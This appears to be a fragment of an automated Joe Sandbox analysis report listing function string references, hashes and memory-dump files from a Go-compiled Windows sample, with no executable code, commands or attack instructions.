            • Associated: 00000002.00000002.1495729001.0000000001417000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495939109.00000000016F8000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495957796.00000000016F9000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_6a0000_file.jbxd
            Similarity
            • API ID: CreateFile
            • String ID:
            • API String ID: 823142352-0
            • Opcode ID: d0420e7b245c68536b1289b904fe6097933a37c154ff1c15fd575de53d0a58cb
            • Instruction ID: ce6971a94adbbdfc6a4ac673c772516671b8bd2adeaaa876f0abc40e40c0d6bd
            • Opcode Fuzzy Hash: d0420e7b245c68536b1289b904fe6097933a37c154ff1c15fd575de53d0a58cb
            • Instruction Fuzzy Hash: 67115E36A05F80C1DB25CB1AE44136973B4F349BE4F244725DFAD57BA4DB29E1A2C740

            Non-executed Functions

            Function 006BC0E0 Relevance: 15.7, Strings: 12, Instructions: 703COMMON
            Download Yara Rule
            Strings
            • ms clock, nBSSRoots=runtime: P exp.) for minTrigger=GOMEMLIMIT=bad m value, elemsize= freeindex= span.list=, npages = tracealloc( p->status= in status idleprocs= gcwaiting= schedtick= timerslen= mallocing=bad timedivfloat64nan1float64nan2float64nan3float32, xrefs: 006BC9EA
            • gc %: gp *(in n= ) - NaN P m= MPC= < end > and]:???pc= GSunMonTueWedThuFriSatJanFebMarAprMayJunJulAugSepOctNovDecUTCEET+00+01CATWATEATGMTHSTHDT-03-04-05ESTCSTCDTMSTMDT-02EDTASTADTPSTPDTNSTNDT+06+03+04+07IST+09+08IDT+12PKT+11KST+05JST+10-01-11-12-08-09+1, xrefs: 006BC84E
            • gcing MB, got= ... max=scav ptr ] = (usageinit ms, fault and tab= top=[...], fp:ntohsMarchApril+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930monthLocalCount-fipsfips-ValueCall GreekAdlamBamumBatakBuhidDograKhmerLatinLimbuNushuOghamOriyaOsageRunicTakri, xrefs: 006BC1A4
            • failed to set sweep barrierwork.nwait was > work.nproc not in stack roots range [allocated pages below zero?address not a stack addressmspan.sweep: bad span stateinvalid profile bucket typeruntime: corrupted polldescruntime: netpollinit failedruntime: asyncPre, xrefs: 006BCEC9
            • , xrefs: 006BC6BF
            • MB globals, work.nproc= work.nwait= nStackRoots= flushedWork double unlock s.spanclass= MB) workers=min too large-byte block (runtime: val=runtime: seq=fatal error: idlethreads= syscalltick=load64 failedxadd64 failedxchg64 failednil stackbase}sched={pc:, xrefs: 006BCCC5
            • @p, xrefs: 006BCE1F
            • ms cpu, (forced) wbuf1.n= wbuf2.n= s.limit= s.state= B work ( B exp.) marked unmarked in use), size = bad prune, tail = recover: not in [ctxt != 0, oldval=, newval= threads=: status= blocked= lockedg=atomicor8 runtime= m->curg=(unknown)traceback} stack=, xrefs: 006BCC0B
            • gc done but gcphase != _GCoffruntime: p.gcMarkWorkerMode= scanobject of a noscan objectruntime: marking free object addspecial on invalid pointerruntime: summary max pages = runtime: levelShift[level] = doRecordGoroutineProfile gp1=timeBegin/EndPeriod not foun, xrefs: 006BCEDA
            • MB goal, s.state = s.base()= heapGoal=GOMEMLIMIT KiB now, pages at sweepgen= sweepgen , bound = , limit = tracefree(tracegc()exitThreadBad varintGC forced runqueue= stopwait= runqsize= gfreecnt= throwing= spinning=atomicand8float64nanfloat32nanException , xrefs: 006BCC85
            • non-concurrent sweep failed to drain all sweep queuescompileCallback: argument size is larger than uintptr'Endpoint' configuration is required for this serviceclient TLS cert(%t) and key(%t) must both be providedx-amz-copy-source-server-side-encryption-custome, xrefs: 006BCEB8
            • ., xrefs: 006BC7CA
            Memory Dump Source
            • Source File: 00000002.00000002.1488870893.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
            • Associated: 00000002.00000002.1488811992.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000000AFF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001066000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001073000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000107A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000107F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001083000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001086000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010BA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010C8000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010D3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010D6000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010DA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010DE000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010E5000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010E7000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010EB000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010F1000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010F4000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010FA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010FC000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001101000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001107000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495309832.0000000001331000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495329316.0000000001334000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495347974.0000000001336000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495368291.0000000001337000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495386569.0000000001339000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495409254.000000000133A000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495438018.0000000001363000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495459528.0000000001364000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495482212.0000000001365000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495505314.0000000001366000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495529886.0000000001367000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495545644.0000000001369000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495565773.000000000136A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495585835.0000000001378000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495605147.000000000137B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495624340.000000000137D000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.000000000137F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.0000000001408000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.000000000140D000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495729001.0000000001417000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495939109.00000000016F8000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495957796.00000000016F9000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_6a0000_file.jbxd
            Similarity
            • API ID:
            • String ID: $ MB globals, work.nproc= work.nwait= nStackRoots= flushedWork double unlock s.spanclass= MB) workers=min too large-byte block (runtime: val=runtime: seq=fatal error: idlethreads= syscalltick=load64 failedxadd64 failedxchg64 failednil stackbase}sched={pc:$ MB goal, s.state = s.base()= heapGoal=GOMEMLIMIT KiB now, pages at sweepgen= sweepgen , bound = , limit = tracefree(tracegc()exitThreadBad varintGC forced runqueue= stopwait= runqsize= gfreecnt= throwing= spinning=atomicand8float64nanfloat32nanException $ ms clock, nBSSRoots=runtime: P exp.) for minTrigger=GOMEMLIMIT=bad m value, elemsize= freeindex= span.list=, npages = tracealloc( p->status= in status idleprocs= gcwaiting= schedtick= timerslen= mallocing=bad timedivfloat64nan1float64nan2float64nan3float32$ ms cpu, (forced) wbuf1.n= wbuf2.n= s.limit= s.state= B work ( B exp.) marked unmarked in use), size = bad prune, tail = recover: not in [ctxt != 0, oldval=, newval= threads=: status= blocked= lockedg=atomicor8 runtime= m->curg=(unknown)traceback} stack=$.$failed to set sweep barrierwork.nwait was > work.nproc not in stack roots range [allocated pages below zero?address not a stack addressmspan.sweep: bad span stateinvalid profile bucket typeruntime: corrupted polldescruntime: netpollinit failedruntime: asyncPre$gc %: gp *(in n= ) - NaN P m= MPC= < end > and]:???pc= GSunMonTueWedThuFriSatJanFebMarAprMayJunJulAugSepOctNovDecUTCEET+00+01CATWATEATGMTHSTHDT-03-04-05ESTCSTCDTMSTMDT-02EDTASTADTPSTPDTNSTNDT+06+03+04+07IST+09+08IDT+12PKT+11KST+05JST+10-01-11-12-08-09+1$gc done but gcphase != _GCoffruntime: p.gcMarkWorkerMode= scanobject of a noscan objectruntime: marking free object addspecial on invalid pointerruntime: summary max pages = runtime: levelShift[level] = doRecordGoroutineProfile gp1=timeBegin/EndPeriod not foun$gcing MB, got= ... max=scav ptr ] = (usageinit ms, fault and tab= top=[...], fp:ntohsMarchApril+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930monthLocalCount-fipsfips-ValueCall GreekAdlamBamumBatakBuhidDograKhmerLatinLimbuNushuOghamOriyaOsageRunicTakri$non-concurrent sweep failed to drain all sweep queuescompileCallback: argument size is larger than uintptr'Endpoint' configuration is required for this serviceclient TLS cert(%t) and key(%t) must both be providedx-amz-copy-source-server-side-encryption-custome$@p
            • API String ID: 0-3764690941
            • Opcode ID: 35bbdd64270a30adf737759ebe69c51d0e634f96babd00a41724bdae909cddb6
            • Instruction ID: 732d792a60052a513efd9f987940006b9616f06a554ea2a779fa714b17801732
            • Opcode Fuzzy Hash: 35bbdd64270a30adf737759ebe69c51d0e634f96babd00a41724bdae909cddb6
            • Instruction Fuzzy Hash: 4C72A072608B84C5EB61DB25E8813EE73A5F789780F45922ADA8D4376ADF3CC285C750
            Function 006CD240 Relevance: 15.5, Strings: 12, Instructions: 542COMMON
            Download Yara Rule
            Strings
            • runtime: summary[runtime: level = , p.searchAddr = RtlGetCurrentPeb, xrefs: 006CD53F, 006CD976
            • , npages = tracealloc( p->status= in status idleprocs= gcwaiting= schedtick= timerslen= mallocing=bad timedivfloat64nan1float64nan2float64nan3float32nan2GOTRACEBACK) at entry+ (targetpc= , plugin: runtime: g : frame.sp=created by broken pipealarm clockbad mes, xrefs: 006CDA3C
            • Ml, xrefs: 006CDDA8
            • , j0 = head = panic: nmsys= locks= dying= allocs m->g0= pad1= pad2= text= minpc= value= (scan)types : type abortedCopySidWSARecvWSASendconnectsignal TuesdayJanuaryOctoberMUI_StdMUI_Dltdefaultaws_csmoutpostFreeSidSleepExAvestanBengaliBrailleCypriotDeseretE, xrefs: 006CDA5A
            • , levelBits[level] = runtime: searchIdx = defer on system stackpanic on system stackasync stack too largestartm: m is spinningstartlockedm: m has pfindrunnable: wrong ppreempt at unknown pcreleasep: invalid argcheckdead: runnable gruntime: newstack at runtime:, xrefs: 006CDB45
            • runtime: levelShift[level] = doRecordGoroutineProfile gp1=timeBegin/EndPeriod not foundruntime: sudog with non-nil cgfput: bad status (not Gdead)LockOSThread nesting overflowsemacquire not on the G stackruntime: split stack overflowstring concatenation too lon, xrefs: 006CDB25
            • ] = pc=none+Inf-Inf: p=cas1cas2cas3cas4cas5cas6 at m= sp= sp: lr: fp= gp= mp=) m=quitbindJuneJulyEESTSASTAKSTAKDTACSTACDTAESTAEDTAWSTCESTNZSTNZDT as hourTagsTypeNONEarn:AhomChamKawiLisuMiaoModiNewaThaiToto3125Atoiermssse3avx2bmi1bmi2int8uintchanfuncpartcall, xrefs: 006CD9B6
            • runtime: npages = runtime: range = {index out of rangeruntime: gp: gp=runtime: getg: g=forEachP: not done in async preemptbad manualFreeListruntime: textAddr cleantimers: bad p frames elided..., locked to threadruntime.semacreateruntime.semawakeupsegmenta, xrefs: 006CD5EF
            • , i = code= addr= m->p= p->m=SCHED curg= ctxt: min= max= (...) m=nil base hangupkilledlistensocketSundayMondayFridayAugustUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13minutesecond-fips-regionBucket%s[%v]PolicyGetAceGetACPsendtoCommonArabicBrahmiCarianChakmaCopticGo, xrefs: 006CDAC5
            • bad summary dataruntime: addr = runtime: base = runtime: head = timeBeginPeriod, xrefs: 006CD61C, 006CDD6C
            • runtime: p.searchAddr = range partially overlapsstack trace unavailablebindm in unexpected GOOSrunqsteal: runq overflowdouble traceGCSweepStartbad use of trace.seqlockfloating point exceptionconnection reset by peerlevel 2 not synchronizedlink number out of r, xrefs: 006CDAA5
            • ] = (usageinit ms, fault and tab= top=[...], fp:ntohsMarchApril+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930monthLocalCount-fipsfips-ValueCall GreekAdlamBamumBatakBuhidDograKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamil1562578125sse41sse42ssse3int16, xrefs: 006CD578
            Memory Dump Source
            • Source File: 00000002.00000002.1488870893.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
            • Associated: 00000002.00000002.1488811992.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000000AFF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001066000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001073000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000107A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000107F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001083000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001086000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010BA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010C8000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010D3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010D6000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010DA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010DE000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010E5000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010E7000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010EB000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010F1000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010F4000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010FA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010FC000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001101000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001107000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495309832.0000000001331000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495329316.0000000001334000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495347974.0000000001336000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495368291.0000000001337000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495386569.0000000001339000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495409254.000000000133A000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495438018.0000000001363000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495459528.0000000001364000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495482212.0000000001365000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495505314.0000000001366000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495529886.0000000001367000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495545644.0000000001369000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495565773.000000000136A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495585835.0000000001378000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495605147.000000000137B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495624340.000000000137D000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.000000000137F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.0000000001408000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.000000000140D000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495729001.0000000001417000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495939109.00000000016F8000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495957796.00000000016F9000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_6a0000_file.jbxd
            Similarity
            • API ID:
            • String ID: , i = code= addr= m->p= p->m=SCHED curg= ctxt: min= max= (...) m=nil base hangupkilledlistensocketSundayMondayFridayAugustUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13minutesecond-fips-regionBucket%s[%v]PolicyGetAceGetACPsendtoCommonArabicBrahmiCarianChakmaCopticGo$, j0 = head = panic: nmsys= locks= dying= allocs m->g0= pad1= pad2= text= minpc= value= (scan)types : type abortedCopySidWSARecvWSASendconnectsignal TuesdayJanuaryOctoberMUI_StdMUI_Dltdefaultaws_csmoutpostFreeSidSleepExAvestanBengaliBrailleCypriotDeseretE$, levelBits[level] = runtime: searchIdx = defer on system stackpanic on system stackasync stack too largestartm: m is spinningstartlockedm: m has pfindrunnable: wrong ppreempt at unknown pcreleasep: invalid argcheckdead: runnable gruntime: newstack at runtime:$, npages = tracealloc( p->status= in status idleprocs= gcwaiting= schedtick= timerslen= mallocing=bad timedivfloat64nan1float64nan2float64nan3float32nan2GOTRACEBACK) at entry+ (targetpc= , plugin: runtime: g : frame.sp=created by broken pipealarm clockbad mes$Ml$] = pc=none+Inf-Inf: p=cas1cas2cas3cas4cas5cas6 at m= sp= sp: lr: fp= gp= mp=) m=quitbindJuneJulyEESTSASTAKSTAKDTACSTACDTAESTAEDTAWSTCESTNZSTNZDT as hourTagsTypeNONEarn:AhomChamKawiLisuMiaoModiNewaThaiToto3125Atoiermssse3avx2bmi1bmi2int8uintchanfuncpartcall$] = (usageinit ms, fault and tab= top=[...], fp:ntohsMarchApril+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930monthLocalCount-fipsfips-ValueCall GreekAdlamBamumBatakBuhidDograKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamil1562578125sse41sse42ssse3int16$bad summary dataruntime: addr = runtime: base = runtime: head = timeBeginPeriod$runtime: levelShift[level] = doRecordGoroutineProfile gp1=timeBegin/EndPeriod not foundruntime: sudog with non-nil cgfput: bad status (not Gdead)LockOSThread nesting overflowsemacquire not on the G stackruntime: split stack overflowstring concatenation too lon$runtime: npages = runtime: range = {index out of rangeruntime: gp: gp=runtime: getg: g=forEachP: not done in async preemptbad manualFreeListruntime: textAddr cleantimers: bad p frames elided..., locked to threadruntime.semacreateruntime.semawakeupsegmenta$runtime: p.searchAddr = range partially overlapsstack trace unavailablebindm in unexpected GOOSrunqsteal: runq overflowdouble traceGCSweepStartbad use of trace.seqlockfloating point exceptionconnection reset by peerlevel 2 not synchronizedlink number out of r$runtime: summary[runtime: level = , p.searchAddr = RtlGetCurrentPeb
            • API String ID: 0-926674670
            • Opcode ID: e13d475bf11d21e765e052286a9916e695289fcbe47d64dc614bafce95efa275
            • Instruction ID: 7658d4a8b4242b03afeccfa622f134cfceb61d446ce59014cb6ec0a0cf147f7c
            • Opcode Fuzzy Hash: e13d475bf11d21e765e052286a9916e695289fcbe47d64dc614bafce95efa275
            • Instruction Fuzzy Hash: 6132CC76B14BC8C2DB60AB11E4417EAB326F789BC0F45412ADE9E07B5ADF38C945CB04
            Function 006BA760 Relevance: 14.1, Strings: 11, Instructions: 368COMMON
            Download Yara Rule
            Strings
            • nil elem type! to finalizer GC worker initruntime: full=runtime: want=MB; allocated timeEndPeriod, xrefs: 006BAD8D
            • because dotdotdotruntime: npages = runtime: range = {index out of rangeruntime: gp: gp=runtime: getg: g=forEachP: not done in async preemptbad manualFreeListruntime: textAddr cleantimers: bad p frames elided..., locked to threadruntime.semacreateruntime., xrefs: 006BAC66
            • runtime.SetFinalizer: first argument was allocated into an arenacompileCallback: expected function with one uintptr-sized resultAWS_SECRET_ACCESS_KEY or AWS_SECRET_KEY not found in environmentclient configured for accelerate but not supported for operationflat, xrefs: 006BAD7C
            • runtime.SetFinalizer: second argument is gcSweep being done but phase is not GCoffobjects added out of order or overlappingmheap.freeSpanLocked - invalid stack freemheap.freeSpanLocked - invalid span stateattempted to add zero-sized address rangeruntime: block, xrefs: 006BACD4
            • runtime.SetFinalizer: first argument is nilruntime.SetFinalizer: finalizer already setgcBgMarkWorker: unexpected gcMarkWorkerModenon in-use span found with specials bit setgrew heap, but no adequate free space foundroot level max pages doesn't fit in summaryru, xrefs: 006BADD0
            • runtime.SetFinalizer: first argument is failed to acquire lock to reset capacitymarkWorkerStop: unknown mark worker modecannot free workbufs when work.full != 0runtime: out of memory: cannot allocate runtime.preemptM: duplicatehandle failedglobal runq empty wi, xrefs: 006BADBF
            • runtime.SetFinalizer: pointer not at beginning of allocated blockinvalid value for environment variable, %s=%s, need true or falsetls: internal error: attempted to read record with QUIC transporttls: server selected an invalid version after a HelloRetryRequest, xrefs: 006BACEA
            • , not pointer != sweepgen MB globals, work.nproc= work.nwait= nStackRoots= flushedWork double unlock s.spanclass= MB) workers=min too large-byte block (runtime: val=runtime: seq=fatal error: idlethreads= syscalltick=load64 failedxadd64 failedxchg64 failed, xrefs: 006BADB0
            • runtime.SetFinalizer: pointer not in allocated blockruntime: use of FixAlloc_Alloc before FixAlloc_Initspan set block with unpopped elements found in resetruntime: GetQueuedCompletionStatusEx failed (errno= casfrom_Gscanstatus: gp->status is not in scan state, xrefs: 006BAD6B
            • , not a functiongc: unswept span KiB work (bg), mheap.sweepgen=runtime: nelems=workbuf is emptymSpanList.removemSpanList.insertbad special kindbad summary dataruntime: addr = runtime: base = runtime: head = timeBeginPeriod, xrefs: 006BACC5
            • runtime.SetFinalizer: cannot pass too many pages allocated in chunk?mspan.ensureSwept: m is not lockedVirtualQuery for stack base failedforEachP: sched.safePointWait != 0schedule: spinning with local workruntime: g is running but p is notdoaddtimer: P already , xrefs: 006BABE3, 006BAC37, 006BACA1
            Memory Dump Source
            • Source File: 00000002.00000002.1488870893.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
            • Associated: 00000002.00000002.1488811992.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000000AFF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001066000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001073000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000107A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000107F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001083000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001086000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010BA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010C8000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010D3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010D6000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010DA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010DE000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010E5000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010E7000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010EB000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010F1000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010F4000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010FA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010FC000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001101000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001107000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495309832.0000000001331000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495329316.0000000001334000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495347974.0000000001336000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495368291.0000000001337000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495386569.0000000001339000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495409254.000000000133A000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495438018.0000000001363000.00000004.00000001.01000000.00000003.sdmpDownload File
